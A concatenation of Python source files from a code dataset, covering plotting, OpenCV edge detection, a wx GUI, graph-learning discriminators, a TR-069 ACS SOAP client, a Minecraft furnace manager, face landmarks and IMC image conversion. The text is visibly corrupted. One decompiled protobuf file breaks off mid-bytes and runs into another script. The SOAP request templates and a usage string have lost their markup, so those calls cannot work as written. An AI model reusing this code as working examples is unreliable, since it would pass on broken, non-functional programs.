6 classes, even number classes are right which represent blue range and odd number classes are wrong which\n### represent the green range\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef cal(path):\n data = np.loadtxt(path)\n print(data.shape)\n open = 0\n intermmediate = 0\n close = 0\n distance = []\n distance1 = []\n distance2 = []\n for i in range(data.shape[0]):\n if data[i, 8] == 0:\n open = open + 1\n distance.append(data[i, 7])\n if data[i, 8] == 2:\n distance1.append(data[i, 7])\n intermmediate = intermmediate + 1\n if data[i, 8] == 4:\n distance2.append(data[i, 7])\n\n close = close + 1\n\n plt.scatter(np.arange(len(distance)), distance)\n plt.savefig('large_range_distribution.png')\n plt.show()\n print(close)\n sum = open + close + intermmediate\n exp = [float(open / sum), float(intermmediate / sum), float(close / sum)]\n return exp\n\n\nif __name__ == '__main__':\n path = ['result1.txt', 'result2.txt',\n 'result3.txt']\n array = []\n real = [0.4, 0.3, 0.3]\n\n for i in range(3):\n print(path[i])\n exp = cal(path[i])\n print(exp)\n array.append(exp)\n fig = plt.figure(num=1, figsize=(15, 8), dpi=80)\n plt.title('propotion comparison')\n plt.plot(np.arange(3), exp, color='y', label='experiment3')\n plt.plot(np.arange(3), real, color='r', label='real')\n plt.legend(loc='upper right')\n \n \n plt.savefig('proportion_comparison')\n mean = np.mean(array, 0)\n rows = ['%d' % x for x in range(3)]\n std = np.std(array, 0)\n\n plt.cla()\n columns = ('mean', 'std')\n cell_text = np.transpose(np.array([mean, std]))\n table = plt.table(cellText=cell_text,\n rowLabels=rows,\n colLabels=columns, loc='center')\n table.scale(1, 4)\n table.set_fontsize(14)\n plt.axis('off')\n plt.title('three score')\n plt.savefig( 'comparison table')\n","sub_path":"two_stage_matching/analyze_population.py","file_name":"analyze_population.py","file_ext":"py","file_size_in_byte":2542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"441060622","text":"import cv2 as cv\nimport time\nfrom imutils.video import VideoStream\nimport imutils\nimport pickle\nimport cv2\nimport dlib\nimport numpy as np\n\n\ndef detector(image):\n frame = image \n detector = dlib.fhog_object_detector('mysign.svm')\n detector_light = dlib.fhog_object_detector('mytraffic_light.svm')\n # gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n rects = detector(frame, 0)\n rects_light = detector_light(frame, 0) \n\n if len(rects) > 0:\n for rect in rects:\n (bX, bY, bW, bH) = (rect.left(), rect.top(), rect.right(), rect.bottom())\n if bX < 0:\n bX = 0\n if bY < 0:\n bY = 0\n if bW < 0:\n bW = 0\n if bH < 0:\n bH = 0\n\n cv2.rectangle(frame, (bX, bY), (bW, bH),(255, 255, 255), 5)\n\n\n\n# vs = VideoStream(usePiCamera=True).start()\nvs = VideoStream(src=0).start()\ntime.sleep(2)\nwhile True:\n frame = vs.read()\n frame = imutils.resize(frame, width=750)\n # frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n frame = cv2.GaussianBlur(frame, (5, 5), 0)\n\n\n lap = cv2.Laplacian(frame, cv2.CV_64F)\n lap = np.uint8(np.absolute(lap))\n # cv2.imshow(\"Laplacian\", lap)\n # cv2.waitKey(0)\n\n # Sobel edge detection\n sobelX = cv2.Sobel(frame, cv2.CV_64F, 1, 0)\n sobelY = cv2.Sobel(frame, cv2.CV_64F, 0, 1)\n\n sobelX = np.uint8(np.absolute(sobelX))\n sobelY = np.uint8(np.absolute(sobelY))\n\n sobelCombined = cv2.bitwise_or(sobelX, sobelY)\n detector(sobelCombined)\n cv2.imshow(\"Frame\", sobelCombined)\n key = cv2.waitKey(100)\n if key == ord(\"q\"):\n break\ncv2.destroyAllWindows()\nvs.stop()\n","sub_path":"img_processing/f_my_edge_sobel.py","file_name":"f_my_edge_sobel.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"549806564","text":"from wx import *\n\nclass MyApp(App):\n def OnInit(self):\n f = Frame(None, -1, \"Titulo\")\n p = Panel(f)\n s = BoxSizer(VERTICAL)\n t1 = self.t1 = TextCtrl(p)\n t2 = self.t2 = TextCtrl(p)\n b = Button(p, -1, \"Suma\")\n r = self.r = StaticText(p)\n b.Bind(EVT_BUTTON, self.sumar)\n s.Add(t1)\n s.Add(t2)\n s.Add(b)\n s.Add(r)\n p.SetSizer(s)\n f.Show()\n\n return True\n\n def sumar(self, e):\n self.r.SetLabel(str(int(self.t1.Value) + int(self.t2.Value)))\n\n\napp = MyApp()\napp.MainLoop()\n\n","sub_path":"18wx-001.py","file_name":"18wx-001.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"371279436","text":"from .layers import Linear\nfrom ..utils import glorot\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass Discriminator(nn.Module):\n def __init__(self, name, dim, mlp_dim=None):\n super(Discriminator, self).__init__()\n self.dim = dim\n self.mlp_dim = mlp_dim\n self.layer = disc_dict[name.lower()](dim, mlp_dim)\n\n def forward(self, x, y, outer=False):\n score = self.layer(x, y, outer)\n return score\n\n\nclass InnerProd(nn.Module):\n def __init__(self, dim, mlp_dim):\n super(InnerProd, self).__init__()\n self.dim = dim\n\n def forward(self, x, y, outer=False):\n if outer:\n score = torch.matmul(x, y.transpose(1,0)) \n else:\n score = torch.sum((x * y), dim=-1)\n return score\n\n\nclass Bilinear(nn.Module):\n def __init__(self, dim, mlp_dim):\n super(Bilinear, self).__init__()\n self.dim = dim\n self.bil = nn.Bilinear(dim, dim, 1)\n self.weight = glorot([dim, dim])\n\n def forward(self, x, y, outer=False):\n if outer:\n score = torch.matmul(torch.matmul(x, self.weight), y.transpose(1,0))\n else:\n score = torch.squeeze(self.bil(x, y), dim=-1)\n return score\n\n\nclass MLP(nn.Module):\n def __init__(self, dim, mlp_dim):\n super(MLP, self).__init__()\n self.dim = dim\n self.layers = nn.ModuleList()\n self.mlp_dim = mlp_dim\n for i in range(1, len(self.mlp_dim) - 1):\n self.layers.append(Linear(self.mlp_dim[i - 1], self.mlp_dim[i], act=F.relu))\n self.layers.append(Linear(self.mlp_dim[-2], self.mlp_dim[-1], act=lambda x: x))\n\n def forward(self, x, y, outer=False):\n h = torch.cat([x, y], dim=1)\n for layer in self.layers:\n h = layer(h)\n return torch.squeeze(h, dim=-1)\n\n\ndisc_dict = {\n \"inner\": InnerProd,\n \"bilinear\": Bilinear,\n \"mlp\": MLP\n}\n","sub_path":"src/opengcl/framework/discriminator.py","file_name":"discriminator.py","file_ext":"py","file_size_in_byte":1933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"314747050","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/svpino/dev/tensorflow-object-detection-sagemaker/todl/tensorflow-object-detection/research/object_detection/protos/anchor_generator_pb2.py\n# Compiled at: 2020-04-05 21:16:38\n# Size of source mod 2**32: 6890 bytes\nimport google.protobuf as _descriptor\nimport google.protobuf as _message\nimport google.protobuf as _reflection\nimport google.protobuf as _symbol_database\n_sym_db = _symbol_database.Default()\nimport object_detection.protos as object__detection_dot_protos_dot_flexible__grid__anchor__generator__pb2\nimport object_detection.protos as object__detection_dot_protos_dot_grid__anchor__generator__pb2\nimport object_detection.protos as object__detection_dot_protos_dot_multiscale__anchor__generator__pb2\nimport object_detection.protos as object__detection_dot_protos_dot_ssd__anchor__generator__pb2\nDESCRIPTOR = _descriptor.FileDescriptor(name='object_detection/protos/anchor_generator.proto',\n package='object_detection.protos',\n syntax='proto2',\n serialized_options=None,\n serialized_pb=b'\\n.object_detection/protos/anchor_generator.proto\\x12\\x17object_detection.protos\\x1a 1]\n\n print('Building common features...')\n graph_ids, graph_texts, class_weights, node_classes, edge_classes, max_num_nodes, coarse_pos_tags, fine_pos_tags, \\\n node_texts = get_common_info(graphs, class_mapping)\n\n print('Calculating graph features...')\n # convert edge labels to ids\n for i, (_, g, _) in enumerate(graphs):\n for u, v, old_attrs in g.edges(data=True):\n edge_class_id = edge_classes.index(transform.get_label_for_edge(old_attrs))\n g.edges[u, v].update({\n 'class_one_hot': tf.one_hot(edge_class_id, depth=len(edge_classes), dtype=tf.float32),\n 'class_ordinal': edge_class_id\n })\n for n_id, old_attrs in g.nodes(data=True):\n node_class = transform.get_node_class_for_node(old_attrs, class_mapping)\n if node_class != transform.IRRELEVANT_CLASS:\n node_class_id = node_classes.index(node_class)\n node_class_one_hot = tf.one_hot(node_class_id, depth=len(node_classes), dtype=tf.float32)\n else:\n node_class_id = -1\n node_class_one_hot = tf.zeros((len(node_classes),))\n pos_tag_attrs = {}\n for pos_tags, pos_tag_names in [('coarse_pos_tags', coarse_pos_tags), ('fine_pos_tags', fine_pos_tags)]:\n pos_tag_ids = [pos_tag_names.index(p) for p in old_attrs.get(pos_tags, [transform.IRRELEVANT_CLASS])]\n pos_tag_attrs[f'{pos_tags}_ordinal'] = pos_tag_ids\n pos_tag_attrs[f'{pos_tags}_encoded'] = tf.math.add_n([\n tf.one_hot(i, depth=len(pos_tag_names))\n for i in pos_tag_ids\n ])\n g.nodes[n_id].update({\n 'class_one_hot': node_class_one_hot,\n 'class_ordinal': node_class_id,\n 'is_target': node_class not in [transform.IRRELEVANT_CLASS]\n })\n g.nodes[n_id].update(pos_tag_attrs)\n\n node_feature = node_feature_builder(n_id, old_attrs, g)\n if type(node_feature) in [int, float]:\n new_node_feature_len = 1\n elif type(node_feature) in [np.ndarray, tf.Tensor, EagerTensor]:\n new_node_feature_len = node_feature.shape[0]\n elif type(node_feature) in [list, set]:\n new_node_feature_len = len(node_feature)\n else:\n raise ValueError(f'Unsupported feature type {type(node_feature)}.')\n if node_feature_len is None:\n node_feature_len = new_node_feature_len\n else:\n assert node_feature_len == new_node_feature_len, 'Inconsistent node feature lengths. Make sure the ' \\\n 'FeatureBuilder always returns the same size features.' \\\n f'new: {new_node_feature_len} vs old: {node_feature_len}'\n g.nodes[n_id].update({\n 'feature': node_feature,\n })\n print(f'\\rDone with graph {i + 1}/{len(graphs)}', end='')\n print()\n\n print('Converting NetworkX graphs to DGL graphs...')\n dgl_graphs: Dict[int, dgl.DGLHeteroGraph] = {}\n for i, (g_id, g, _) in enumerate(graphs):\n dgl_graph: dgl.DGLHeteroGraph = dgl.from_networkx(\n g,\n edge_attrs=['class_one_hot', 'class_ordinal'],\n node_attrs=['class_one_hot', 'class_ordinal', 'is_target', 'feature']\n )\n dgl_graphs[i] = dgl_graph\n print(f'\\rDone with graph {i + 1}/{len(graphs)}', end='')\n print()\n\n return {\n 'ids': np.array(graph_ids),\n 'texts': graph_texts,\n 'class_weights': class_weights,\n 'node_classes': node_classes,\n 'edge_classes': edge_classes,\n 'max_num_nodes': max_num_nodes,\n 'node_feature_len': node_feature_len,\n\n 'dgl_graphs': dgl_graphs,\n\n 'node_texts': node_texts\n }\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Processing utility for our datasets.')\n parser.add_argument(\n '--dataset',\n required=True,\n type=str,\n help='Path to the dataset to process.'\n )\n parser.add_argument(\n '--target',\n required=True,\n type=str,\n help='Path to the target file.'\n )\n parser.add_argument(\n '--features',\n type=str,\n help='Node features to build.',\n default='none',\n choices=['none', *Word2VecFeatureBuilder.SUPPORTED_MODELS, 'debug', 'bert', 'fine-pos', 'coarse-pos', 'concat']\n )\n parser.add_argument(\n '--mappings',\n nargs='*',\n required=False,\n help='One or many class mappings in the form :, '\n 'e.g. to change all Events to Tasks use Event:Task'\n )\n args = parser.parse_args()\n\n feature_builder: BaseNodeFeatureBuilder\n if args.features == 'none' or args.features == 'None':\n feature_builder = IdNodeFeatureBuilder()\n elif args.features == 'debug':\n feature_builder = DebugFeatureBuilder()\n elif args.features == 'bert':\n feature_builder = BertFeatureBuilder()\n elif args.features in ['fine-pos', 'coarse-pos']:\n feature_builder = PosFeatureBuilder(args.features)\n elif args.features in Word2VecFeatureBuilder.SUPPORTED_MODELS:\n feature_builder = Word2VecFeatureBuilder(args.features)\n elif args.features == 'concat':\n feature_builder = ConcatFeatureBuilder()\n else:\n raise ValueError(f'Unknown feature builder \"{args.features}\"')\n\n class_mapping = {}\n if args.mappings:\n for mapping in args.mappings:\n source, target = mapping.split(':')\n if target == '':\n target = None\n class_mapping[source] = target\n print(f'Using class mapping {class_mapping}')\n\n print(f'Converting {args.dataset} to networkx graphs...')\n transformed_graphs = process_mrp_to_networkx(args.dataset)\n print('Done!')\n data = process_networkx_to_dgl(transformed_graphs, node_feature_builder=feature_builder, class_mapping=class_mapping)\n\n pickled = pickle.dumps(data)\n print(f'Writing approximately {len(pickled) / 1e6:.1f}MB of processed data to disk...')\n os.makedirs(os.path.dirname(args.target), exist_ok=True)\n with open(args.target, 'wb') as out_file:\n out_file.write(pickled)\n\n print('Done!')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"ucca4bpm/data/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":10408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"335059852","text":"from PIL import Image, ImageDraw\nimport optparse\nimport face_recognition\n'''\n打印脸部特征轮廓\n'''\ndef faceFeature(picture):\n\t# 将jpg文件加载到numpy 数组中\n\timage = face_recognition.load_image_file(picture)\n\n\t# 查找图像中所有面部的所有面部特征\n\tface_landmarks_list = face_recognition.face_landmarks(image)\n\n\tprint(\"I found {} face(s) in this photograph.\".format(len(face_landmarks_list)))\n\n\tfor face_landmarks in face_landmarks_list:\n\n\t #打印此图像中每个面部特征的位置\n\t facial_features = [\n\t 'chin',\n\t 'left_eyebrow',\n\t 'right_eyebrow',\n\t 'nose_bridge',\n\t 'nose_tip',\n\t 'left_eye',\n\t 'right_eye',\n\t 'top_lip',\n\t 'bottom_lip'\n\t ]\n\n\t for facial_feature in facial_features:\n\t print(\"The {} in this face has the following points: {}\".format(facial_feature, face_landmarks[facial_feature]))\n\n\t #让我们在图像中描绘出每个人脸特征!\n\t pil_image = Image.fromarray(image)\n\t d = ImageDraw.Draw(pil_image)\n\n\t for facial_feature in facial_features:\n\t d.line(face_landmarks[facial_feature], width=5)\n\n\t pil_image.show()\n\ndef main():\n\tparser = optparse.OptionParser('usage%prog '+'-p ') \n\tparser.add_option('-p', dest='picture', type='string', help='specify picture file') \n\t(options, args) = parser.parse_args() \n\tpicture = options.picture\n\tif picture == None: \n\t\tprint(parser.usage) \n\t\texit(0)\n\tfaceFeature(picture)\n\nif __name__ == '__main__':\n\tmain()\n","sub_path":"face_recognition/FaceFeature.py","file_name":"FaceFeature.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"72454256","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jul 21 08:47:32 2020\n\n@author: xavi2\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\n\narr_pand = np.random.randint(0,10,6).reshape(2,3)\n\ndf1 = pd.DataFrame(arr_pand)\ns1 = df1[0]\ns2 = df1[1]\ns3 = df1[2]\n\ndf1[3] = s1\ndf1[4] = s1 * s2\n\ndatos_fisicos_uno = pd.DataFrame(\n arr_pand,\n columns = [\n 'Estatura (cm)',\n 'Peso (kg)',\n 'Edad (anios)'])\n\ndatos_fisicos_dos = pd.DataFrame(\n arr_pand,\n columns = [\n 'Estatura (cm)',\n 'Peso (kg)',\n 'Edad (anios)'],\n index = [\n 'Rodman',\n 'Xavier'])\n\nserie_peso = datos_fisicos_dos['Peso (kg)']\ndatos_rodman = serie_peso['Rodman']\nprint(serie_peso)\nprint(datos_rodman)\n\ndf1.index = ['Rodman', 'Xavier']\ndf1.index = ['Wendy', 'Carolina']\ndf1.columns = ['A', 'B', 'C', 'D', 'E']\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"03-Pandas/c_dateframes.py","file_name":"c_dateframes.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"368878092","text":"from zeep import Client\nfrom zeep.wsse.username import UsernameToken\nimport xmltodict\n\nimport os\n\nif \"BFT_DEBUG\" in os.environ:\n import logging.config\n\n logging.config.dictConfig({\n 'version': 1,\n 'formatters': {\n 'verbose': {\n 'format': '%(name)s: %(message)s'\n }\n },\n 'handlers': {\n 'console': {\n 'level': 'DEBUG',\n 'class': 'logging.StreamHandler',\n 'formatter': 'verbose',\n },\n },\n 'loggers': {\n 'zeep.transports': {\n 'level': 'DEBUG',\n 'propagate': True,\n 'handlers': ['console'],\n },\n }\n })\n\nfrom boardfarm.lib.bft_logging import LoggerMeta\n\nclass FriendlyACS():\n __metaclass__ = LoggerMeta\n log = \"\"\n log_calls = \"\"\n\n model = \"friendly_acs_soap\"\n\n def __init__(self, *args, **kwargs):\n self.args = args\n self.kwargs = kwargs\n self.username = self.kwargs['username']\n self.password = self.kwargs['password']\n self.ipaddr = self.kwargs['ipaddr']\n self.wsdl = \"http://\" + self.kwargs['ipaddr'] + \"/ftacsws/acsws.asmx?WSDL\"\n self.client = Client(wsdl=self.wsdl, wsse=UsernameToken(self.username, self.password))\n self.port = self.kwargs.get('port', '80')\n self.log = \"\"\n\n name = \"acs_server\"\n\n def __str__(self):\n return \"FriendlyACS\"\n\n def close(self):\n pass\n\n def get(self, serial_number, param, source=0):\n # source = 0 (CPE), source = 1 (DB)\n ret = self.client.service.FTGetDeviceParameters(devicesn=serial_number, source=source, arraynames=[param])\n if None == ret['Params']:\n return None\n else:\n return ret['Params']['ParamWSDL'][0]['Value']\n\n def set(self, serial_number, attr, value):\n array_of_param = self.client.get_type('{http://www.friendly-tech.com}ArrayOfParam')\n\n arr = array_of_param([{'Name': attr, 'Value': value}])\n\n # TODO: investigate push, endsession, reprovision, priority to make sure they are what we want\n self.client.service.FTSetDeviceParameters(devicesn=serial_number, \\\n arrayparams=arr, \\\n push=True, \\\n endsession=False, \\\n priority=0)\n\n def rpc(self, serial_number, name, content):\n ''' Invoke custom RPC on specific CM'''\n ret = self.client.service.FTRPCInvoke(devicesn=serial_number, rpcname=name, soapcontent=content)\n return xmltodict.parse(ret['Response'])\n\n def rpc_GetParameterAttributes(self, serial_number, name):\n content = ' %s ' % name\n\n ret = self.rpc(serial_number, name, content)\n\n return ret['cwmp:GetParameterAttributesResponse']['ParameterList']['ParameterAttributeStruct']\n\n def rpc_GetParameterValues(self, serial_number, name):\n content = ' %s ' % name\n\n ret = self.rpc(serial_number, name, content)\n\n return ret['cwmp:GetParameterValuesResponse']['ParameterList']['ParameterValueStruct']['Value']['#text']\n\n def getcurrent(self, serial_number, param, source=0):\n self.client.service.FTGetDeviceParameters(devicesn=serial_number, source=source, arraynames=[param+'.'])\n\n def rpc_SetParameterAttributes(self, serial_number, name, set_value):\n content = ' %s 1 %s 0 ' %(name, set_value)\n\n self.rpc(serial_number, name, content)\n\n def rpc_AddObject(self, serial_number, obj_name):\n content = ' %s. '% obj_name\n self.rpc(serial_number, obj_name, content)\n\n def rpc_DeleteObject(self, serial_number, obj_name):\n content = ' %s. ' % obj_name\n self.rpc(serial_number, obj_name, content)\n\n def is_online(self, serial_number):\n ret = self.client.service.FTCPEStatus(devicesn=serial_number)\n return ret['Online']\n\nif __name__ == '__main__':\n import sys\n\n if ':' in sys.argv[1]:\n ip = sys.argv[1].split(':')[0]\n port = sys.argv[1].split(':')[1]\n else:\n ip = sys.argv[1]\n port = 80\n\n acs = FriendlyACS(ipaddr=ip, port=port, username=sys.argv[2], password=sys.argv[3])\n\n ret = acs.rpc_GetParameterAttributes('DEAP815610DA', 'Device.WiFi.SSID.1.SSID')\n print(ret['Notification'])\n\n ret = acs.get('DEAP815610DA', 'Device.DeviceInfo.SoftwareVersion')\n print(ret)\n\n ret = acs.get ('DEAP815610DA', 'Device.WiFi.SSID.1.SSID')\n print(ret)\n","sub_path":"boardfarm/devices/friendly_acs_soap.py","file_name":"friendly_acs_soap.py","file_ext":"py","file_size_in_byte":5591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"192381249","text":"from twisted.internet.defer import inlineCallbacks\nfrom twisted.internet.task import LoopingCall\n\nfrom bravo.blocks import blocks, items, furnace_fuel, unstackable\nfrom bravo.inventory import Slot\nfrom bravo.inventory.windows import FurnaceWindow\n\n# TODO: move this out of the module into plug-in\nfurnace_recipes = {\n blocks[\"gold-ore\"].slot : Slot(items[\"gold-ingot\"].slot, 0, 1),\n blocks[\"iron-ore\"].slot : Slot(items[\"iron-ingot\"].slot, 0, 1),\n blocks[\"diamond-ore\"].slot : Slot(items[\"diamond\"].slot, 0, 1),\n blocks[\"log\"].slot : Slot(items[\"coal\"].slot, 1, 1), # charcoal\n blocks[\"cactus\"].slot : Slot(items[\"dye\"].slot, 2, 1), # green dye\n blocks[\"sand\"].slot : Slot(blocks[\"glass\"].slot, 0, 1),\n blocks[\"cobblestone\"].slot : Slot(blocks[\"stone\"].slot, 0, 1),\n items[\"clay-balls\"].slot : Slot(items[\"clay-brick\"].slot, 0, 1),\n items[\"raw-porkchop\"].slot : Slot(items[\"cooked-porkchop\"].slot, 0, 1),\n items[\"raw-fish\"].slot : Slot(items[\"cooked-fish\"].slot, 0, 1)\n}\n\nclass FurnaceManager(object):\n\n def __init__(self, factory):\n self.factory = factory\n self.furnaces = {}\n self.cleanup_timer = LoopingCall(self.cleanup)\n\n def start(self):\n \"\"\"\n Enable this manager.\n\n While this manager is running, furnaces will be reaped every 5\n minutes.\n \"\"\"\n\n self.cleanup_timer.start(300)\n\n def stop(self):\n self.cleanup_timer.stop()\n\n @inlineCallbacks\n def update(self, coords):\n # We've got informed that furnace content is changed\n if coords not in self.furnaces:\n bigx, smallx, bigz, smallz, y = coords\n chunk = yield self.factory.world.request_chunk(bigx, bigz)\n tile = chunk.tiles[(smallx, y, smallz)]\n self.furnaces[coords] = FurnaceProcess(tile, coords)\n self.furnaces[coords].factory = self.factory\n self.furnaces[coords].update()\n\n def remove(self, coords):\n if coords in self.furnaces:\n del(self.furnaces[coords])\n\n def cleanup(self):\n # remove processes that do not run\n for c in self.furnaces.keys():\n if not self.furnaces[c].running:\n self.remove(c)\n\nclass FurnaceProcess(object):\n '''\n NOTE: Our furnace process doesn't operate with world ticks.\n We do updates twice per second. It's our UI update rate.\n '''\n def __init__(self, tile, coords):\n self.tile = tile\n self.coords = coords\n self.running = False\n self.burning = LoopingCall(self.burn)\n\n def update(self):\n if not self.running:\n if self.hasFuel and self.canCraft:\n self.tile.burntime = 0\n self.tile.cooktime = 0\n self.burning.start(0.5) # start burning loop\n\n def burn(self):\n # -----------------------------\n # --- item crafting ---\n # -----------------------------\n if self.canCraft:\n self.tile.cooktime += 1\n # Notchian time is ~9.25-9.50 sec.\n if self.tile.cooktime == 20: # cooked!\n source = self.tile.inventory.crafting[0]\n product = furnace_recipes[source.primary]\n self.tile.inventory.crafting[0] = source.decrement()\n if self.tile.inventory.crafted[0] is None:\n self.tile.inventory.crafted[0] = product\n else:\n item = self.tile.inventory.crafted[0]\n self.tile.inventory.crafted[0] = item.increment(product.quantity)\n self.update_all_windows_slot(0, self.tile.inventory.crafting[0])\n self.update_all_windows_slot(2, self.tile.inventory.crafted[0])\n self.tile.cooktime = 0\n else:\n self.tile.cooktime = 0\n\n # ----------------------------\n # --- fuel consume ---\n # ----------------------------\n if self.tile.burntime == 0:\n if self.hasFuel and self.canCraft: # burn next portion of the fuel\n fuel = self.tile.inventory.fuel[0]\n self.tile.burntime = self.burn_max = furnace_fuel[fuel.primary]\n self.tile.inventory.fuel[0] = fuel.decrement()\n if not self.running:\n self.on_off(True)\n self.update_all_windows_slot(1, self.tile.inventory.fuel[0])\n else: # out of fuel or no need to burn more\n self.burning.stop()\n self.on_off(False)\n # reset cook time\n self.tile.cooktime = 0\n self.update_all_windows_progress(0, 0)\n return\n self.tile.burntime -= 1\n\n # ----------------------------\n # --- update progress bars ---\n # ----------------------------\n cook_progress = 185 * self.tile.cooktime / 19\n burn_progress = 250 * self.tile.burntime / self.burn_max\n self.update_all_windows_progress(0, cook_progress)\n self.update_all_windows_progress(1, burn_progress)\n\n def on_off(self, state):\n self.running = state\n bigx, smallx, bigz, smallz, y = self.coords\n block = state and blocks[\"burning-furnace\"] or blocks[\"furnace\"]\n d = self.factory.world.request_chunk(bigx, bigz)\n @d.addCallback\n def replace_furnace_block(chunk):\n chunk.set_block((smallx, y, smallz), block.slot)\n self.factory.flush_chunk(chunk)\n\n def update_all_windows_slot(self, slot, item):\n # update all opened windows\n for p in self.factory.protocols.itervalues():\n if p.windows and type(p.windows[-1]) == FurnaceWindow:\n window = p.windows[-1]\n if window.coords == self.coords:\n if item is None:\n p.write_packet(\"window-slot\",\n wid=window.wid, slot=slot, primary=-1)\n else:\n p.write_packet(\"window-slot\",\n wid=window.wid, slot=slot, primary=item.primary,\n secondary=item.secondary, count=item.quantity)\n\n def update_all_windows_progress(self, bar, value):\n # update all opened windows\n for p in self.factory.protocols.itervalues():\n if p.windows and type(p.windows[-1]) == FurnaceWindow:\n window = p.windows[-1]\n if window.coords == self.coords:\n p.write_packet(\"window-progress\", wid=window.wid,\n bar=bar, progress=value)\n\n @property\n def hasFuel(self):\n # if the furnace hase something to burn\n if self.tile.inventory.fuel[0] is None:\n return False\n else:\n return self.tile.inventory.fuel[0].primary in furnace_fuel\n\n @property\n def canCraft(self):\n # if have somethig to craft from...\n if self.tile.inventory.crafting[0] is None:\n return False\n if self.tile.inventory.crafting[0].primary in furnace_recipes:\n #...and has space for it\n if self.tile.inventory.crafted[0] is None:\n return True\n else:\n crafting = self.tile.inventory.crafting[0]\n crafted = self.tile.inventory.crafted[0]\n if furnace_recipes[crafting.primary][0] != crafted.primary:\n return False\n elif crafted.primary in unstackable:\n return False\n elif crafted.quantity + furnace_recipes[crafting.primary].quantity > 64:\n return False\n else:\n return True\n else:\n return False\n","sub_path":"bravo/utilities/furnace.py","file_name":"furnace.py","file_ext":"py","file_size_in_byte":7717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"156232353","text":"from __future__ import with_statement, division\n\nimport ij.process as process\nfrom ij import ImageStack\n\ntry:\n import sc.fiji.i5d.Image5D\n import sc.fiji.i5d as i5d\nexcept:\n import i5d.Image5D\n import i5d as i5d\n\nimport struct\n\nfrom loci.formats import ImageReader , MetadataTools, IFormatWriter, FormatTools\nimport ome.xml.model.enums.DimensionOrder as DimensionOrder\nimport ome.xml.model.primitives.PositiveInteger as PositiveInteger\nimport ome.xml.model.primitives.NonNegativeInteger as NonNegativeInteger\nimport ome.xml.model.enums.PixelType as PixelType\nfrom loci.formats import ImageWriter, ImageReader\nfrom loci.plugins import BF\nimport ome.units.quantity.Length as Length\nimport ome.units.UNITS as units\n\nimport loci.common.DataTools as DataTools\n\nimport xml.etree.ElementTree as et\n\n\ndef convert_imc_to_image(imc_acquisition):\n \"\"\"\n Load an MCD and convert it to a image5d Tiff\n :param filename: Filename of the MCD\n :return: an image5d image\n \"\"\"\n ac_id = imc_acquisition.image_ID\n print('Contstruct image from data: %s' %ac_id)\n\n img_channels = imc_acquisition.n_channels\n channel_names = imc_acquisition.channel_metals\n channel_labels = imc_acquisition.channel_labels\n\n img_data = imc_acquisition.get_img_stack_cyx()\n\n if channel_labels is not None:\n channel_ids = [lab + '_' + name for name, lab in\n zip(channel_names, channel_labels)]\n else:\n channel_ids = channel_names\n print('Add planes to stack:')\n imgstack = stack_to_imagestack(img_data, channel_ids=channel_ids)\n\n file_name = imc_acquisition.original_filename.replace('.mcd','')\n file_name = file_name.replace('.txt', '')\n description = imc_acquisition.image_description\n if description is not None:\n file_name = '_'.join((file_name,'a'+ac_id, 'd'+description))\n else:\n file_name = '_'.join((file_name, 'a' + ac_id))\n\n i5d_img = get_image5d(file_name, imgstack, channel_ids)\n\n i5d_img.setDefaultColors()\n print('finished image: %s' %ac_id)\n\n return i5d_img\n\n\ndef stack_to_imagestack(cxy_stack, img_stack=None, channel_ids=None):\n \"\"\"\n\n :param cxy_stack:\n :param img_stack:\n :return:\n \"\"\"\n\n c, x, y = (len(cxy_stack), len(cxy_stack[0]), len(cxy_stack[0][0]))\n if img_stack is None:\n img_stack = ImageStack(y, x)\n\n for i in range(c):\n cur_proc = process.FloatProcessor(cxy_stack[i])\n cur_proc.flipVertical()\n cur_proc = cur_proc.rotateRight()\n if channel_ids is None:\n img_stack.addSlice(cur_proc)\n else:\n img_stack.addSlice(channel_ids[i], cur_proc)\n\n return img_stack\n\n\ndef get_image5d(imgName, img_stack, channel_names):\n \"\"\"\n\n :param imgName:\n :param img_stack:\n :param channel_names:\n :return:\n \"\"\"\n\n nchannels = len(channel_names)\n for i, lab in enumerate(channel_names):\n img_stack.setSliceLabel(lab, i+1)\n i5dimg = i5d.Image5D(imgName, img_stack, nchannels,1,1)\n\n for i,cid in enumerate(channel_names):\n i5dimg.getChannelCalibration(i+1).setLabel(str(cid))\n\n i5dimg.setDefaultColors()\n return i5dimg\n\ndef load_ome_img(file_name):\n \"\"\"\n\n :param file_name:\n :return:\n \"\"\"\n imps = BF.openImagePlus(file_name)\n imag = imps[0]\n # parse metadata\n reader = ImageReader()\n omeMeta = MetadataTools.createOMEXMLMetadata()\n reader.setMetadataStore(omeMeta)\n reader.setId(file_name)\n print(omeMeta)\n reader.close()\n\n return (imag, omeMeta)\n\ndef 